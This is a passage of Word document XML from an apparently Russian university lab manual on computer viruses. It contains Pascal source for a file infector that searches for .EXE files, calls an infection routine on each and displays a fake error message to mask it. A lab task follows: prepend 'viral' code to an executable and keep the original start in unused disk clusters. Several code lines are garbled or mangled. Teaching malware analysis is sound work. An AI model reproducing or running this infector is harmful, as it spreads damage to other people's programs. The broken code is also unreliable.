        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Inc(lnfFiles); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">end;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Начало</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>процедуры</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> FindTarget}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Ищем в текущем каталоге файлы по маске *.ЕХЕ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с атрибутами Archive}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">FindFirstF.EXE', Archive, Sr); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">{Пока есть файлы для заражения} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">While DosError=0 Do </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If Sr.Name=" Then Exit; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Запоминаем имя найденного файла в переменную TargetFile}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TargetFile:=Sr.Name; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Вызываем процедуру заражения}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">InfectFile; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Если заразили InfCount файлов, завершаем поиск}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If InfFiles &gt; InfCount Then Exit; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Ищем следующий файл по маске}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">FindNext(Sr); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">end;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Основное</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тело</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Инициализируемся}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">hit; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Ищем жертвы и заражаем их}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">FindTarget; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Выдаем на экран сообщение об ошибке}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteLn('Abnormal program termination.'); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Это чтобы компилятор вставил в код константы VirName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и Author, условие же поставлено таким образом,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>что эти строки никогда не будут выведены на экран}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If 2=3 Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteLn(VirName); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">WriteLn(Author); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">end; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>end.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--2"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Программное обеспечение</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Для выполнения работы необходима опер</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ционная система WINDOWS, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>библиотека</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft .NET Framework версии 1.1 или выше, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рограмма Mathcad 13 и выше.</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rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Создать либо взять готовый любой .exe файл, в начало которого з</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>писать исполняемый «вирусный» код, а оригинальное начало сохранить в неи</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>пользуемых кластерах диске (либо в отдельном файле) с помощью разработа</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ной программы или внесением изменения вручную;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Использовать программное обеспечение из папки «\\192.168.31.31\для студентов\Вирусы\лабораторные\программы для ЛР\*.VIR»;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>продемонстрировать с помощью любого редактора (наглядно показывающего содержимое файла в шестнадцатеричном виде) внесённые измен</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>продемонстрировать процесс перехвата внесения изменения в файл любыми средствами (написанная программа, готовая программа и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>записать в папку «\\192.168.31.31\для студе</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тов\Вирусы\лабораторные\для программ студентов\”Ф.И.О.”\» оригинальный и изменённый файл, программу (и её исходный код) вносившую изменения, наглядные результаты процесса перехвата внесения изменения в файл.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Mt--1b"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> </w:t>
      </w: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pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>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D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1506"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Как работает вирус, замещающий программный код?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1506"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
